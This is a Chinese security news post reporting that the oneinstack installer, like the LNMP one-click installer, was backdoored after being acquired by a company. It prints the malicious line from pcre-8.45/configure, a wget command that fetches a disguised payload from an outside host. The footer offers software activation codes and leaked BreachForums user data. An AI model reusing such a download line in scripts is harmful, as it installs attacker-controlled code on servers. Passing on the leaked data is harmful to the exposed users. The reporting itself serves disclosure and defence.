继LNMP后oneinstack也被添加了后门!

admin 2023年10月8日13:12:46继LNMP后oneinstack也被添加了后门!已关闭评论132 views字数 1169阅读3分53秒阅读模式

9月下旬,国内安全公司发现知名Web集成环境安装脚本 "lnmp一键安装包" 被投毒,开发者、站长、企业IT管理员下载的一键安装包被加了后门程序。

图片

当时我们都以为这是LNMP一键安装包的服务器被黑了,不过后来有网友发现LNMP 一键安装包已经被金华市矜贵网络科技有限公司(下称金华矜贵)收购

而关于安装包被投毒问题金华矜贵没有发布任何声明,LNMP论坛的发帖也遭到管理员删除。

图片

现在来看这并不是服务器被黑了,因为被金华矜贵收购的另一个集成环境安装脚本 oneinstack 也被发现投毒,所以情况很明了了:

那就是根本不是服务器被黑,而是他们自己在脚本里插入了恶意代码主动投毒,用来下载某些恶意软件,进而可以控制大量网站或服务器,但具体目的尚不清楚。

目前在 GitHub 和 V2EX 上已经有帖子在讨论这件事,鉴于金华矜贵还试图收购秋水逸冰的 lamp.sh 一键安装包 (但被秋大拒绝了),他们后续可能还会盯上其他一键安装包,因此建议大家不要再使用这类一键安装包,否则自己的网站或服务器可能也会变成肉鸡。

oneinstack 开发者回应称:金华市矜贵网络科技有限公司收购现有的几个面板以及安装包主要是为了布局类似宝塔的产品。想依赖 oneinstack 打开知名度。公司作为项目的投资商。协商的协议为公司为项目提供开发资金,并提供所有服务器资源。但是项目的管理权限以及运维权限都在我手中。目前各位开发者的精力主要是进行新的面板开发,对于出现本次被挂马事故主要原因在于我们没有对项目进行及时的管理。后续会加强安全措施。杜绝该问题的出现。

图片

恶意代码隐藏在图片里

pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg

GitHub讨论地址

https://github.com/oneinstack/oneinstack/issues/511

如果你最近使用过 LNMP 一键安装包、oneinstack、WDCP 之类的部署过环境,建议直接重装系统。

图片

关注公众号后台回复 0001 领取Windows Proxifier激活码0002 领取Mac Proxifier激活码,0003 获取无需登录在线即用的New Bing地址,0004 获取BreachForums暗网论坛泄露用户数据

加我微信好友,邀请你进交流群

图片

往期推荐

LNMP被供应链投毒!

谷歌翻译被利用做黑帽SEO?

网攻西北工业大学的美国安局人员真实身份锁定!我方将……

Atlas VPN存在泄露用户真实IP地址漏洞

国产之光IDE,自带国产特色VIP功能!

火绒官网报毒!

某微0click严重漏洞

BreachForums暗网论坛用户数据泄露!

CCTV主站被做黑帽SEO

文章号,欢迎关注

图片

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月8日13:12:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   继LNMP后oneinstack也被添加了后门!https://cn-sec.com/archives/2093338.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.